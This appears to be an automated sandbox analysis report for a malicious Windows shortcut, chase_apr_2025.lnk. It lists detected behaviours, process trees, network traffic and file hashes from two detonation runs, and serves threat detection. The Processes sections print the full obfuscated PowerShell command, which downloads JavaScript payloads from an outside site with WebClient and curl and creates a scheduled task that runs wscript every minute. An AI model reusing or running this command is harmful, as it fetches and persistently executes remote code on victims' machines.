Analysis Overview
SHA256
09ef17dc4284a8d1a8b937354bd8137aa9c0d98bffb897bd891ccff854484e43
Threat Level: Likely malicious
The file chase_apr_2025.lnk was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-04-18 17:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-04-18 17:49
Reported
2025-04-18 17:50
Platform
win10v2004-20250410-en
Max time kernel
41s
Max time network
40s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-2645532622-3298555945-705856666-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 112 wrote to memory of 4204 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 112 wrote to memory of 4204 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4204 wrote to memory of 4776 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\curl.exe |
| PID 4204 wrote to memory of 4776 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\curl.exe |
| PID 4204 wrote to memory of 4704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe |
| PID 4204 wrote to memory of 4704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe |
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $affl = $env:programdata + '\' + ('2qr3mg7cssz4nr.js yxliyx19s'); $getf='D'+'ow'+'nl'+'oadF'+'ile'; $t670luhhb7i6w = New-Object Net.WebClient; $wscs = 'wscript '; $t670luhhb7i6w.$getf('https://rietiholidays.it/wp-content/uploads/2021/06/unprojectingsJX.php', '2qr3mg7cssz4nr.js'); . ('cu'+'rl.e'+'xe') -s -o zqd1lm17ezgl 'https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php'; mv zqd1lm17ezgl 'yxliyx19s.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $affl) /tn yxliyx19s;
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -s -o zqd1lm17ezgl https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s" /tn yxliyx19s
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | rietiholidays.it | udp |
| IT | 185.81.1.167:443 | rietiholidays.it | tcp |
| US | 8.8.8.8:53 | www.rietiholidays.it | udp |
| IT | 185.81.1.167:443 | www.rietiholidays.it | tcp |
| IT | 185.81.1.167:443 | www.rietiholidays.it | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.22.144.149:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
memory/4204-2-0x00007FFB4BFC3000-0x00007FFB4BFC5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pk4kxzrp.xao.ps1
| Hash | Value |
|---|---|
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4204-12-0x000002257AC20000-0x000002257AC42000-memory.dmp
memory/4204-13-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp
memory/4204-14-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp
memory/4204-15-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp
C:\ProgramData\zqd1lm17ezgl
| Hash | Value |
|---|---|
| MD5 | 6f2c98b320a97239e18b95658d60ac75 |
| SHA1 | 19b01f664642846c84e02cf0c07a61d4bf8785cd |
| SHA256 | 7729e82cf6e68f42e11257e678e08e28e3dd3597033bed67f206e04623c8d166 |
| SHA512 | c65cedea9760d2dc9fc150ba1a3303f212295984fbaebe718a81acf498090893a07201f5cc6e05af27597d2e826d482fce2ff546285e25a90780ad1675daa500 |
memory/4204-20-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-04-18 17:49
Reported
2025-04-18 17:50
Platform
win11-20250410-en
Max time kernel
36s
Max time network
4s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2920 wrote to memory of 2168 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2920 wrote to memory of 2168 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2168 wrote to memory of 4872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\curl.exe |
| PID 2168 wrote to memory of 4872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\curl.exe |
| PID 2168 wrote to memory of 4940 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe |
| PID 2168 wrote to memory of 4940 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe |
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $affl = $env:programdata + '\' + ('2qr3mg7cssz4nr.js yxliyx19s'); $getf='D'+'ow'+'nl'+'oadF'+'ile'; $t670luhhb7i6w = New-Object Net.WebClient; $wscs = 'wscript '; $t670luhhb7i6w.$getf('https://rietiholidays.it/wp-content/uploads/2021/06/unprojectingsJX.php', '2qr3mg7cssz4nr.js'); . ('cu'+'rl.e'+'xe') -s -o zqd1lm17ezgl 'https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php'; mv zqd1lm17ezgl 'yxliyx19s.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $affl) /tn yxliyx19s;
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -s -o zqd1lm17ezgl https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s" /tn yxliyx19s
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | rietiholidays.it | udp |
| IT | 185.81.1.167:443 | www.rietiholidays.it | tcp |
| IT | 185.81.1.167:443 | www.rietiholidays.it | tcp |
| IT | 185.81.1.167:443 | www.rietiholidays.it | tcp |
| GB | 2.22.144.142:80 | r10.o.lencr.org | tcp |
| N/A | 127.0.0.1:59468 | N/A | tcp |
Files
memory/2168-2-0x00007FF8A8853000-0x00007FF8A8855000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f0bguvcx.nlb.ps1
| Hash | Value |
|---|---|
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2168-11-0x0000025352440000-0x0000025352462000-memory.dmp
memory/2168-12-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp
memory/2168-13-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp
memory/2168-14-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp
C:\ProgramData\zqd1lm17ezgl
| Hash | Value |
|---|---|
| MD5 | 6f2c98b320a97239e18b95658d60ac75 |
| SHA1 | 19b01f664642846c84e02cf0c07a61d4bf8785cd |
| SHA256 | 7729e82cf6e68f42e11257e678e08e28e3dd3597033bed67f206e04623c8d166 |
| SHA512 | c65cedea9760d2dc9fc150ba1a3303f212295984fbaebe718a81acf498090893a07201f5cc6e05af27597d2e826d482fce2ff546285e25a90780ad1675daa500 |
memory/2168-19-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp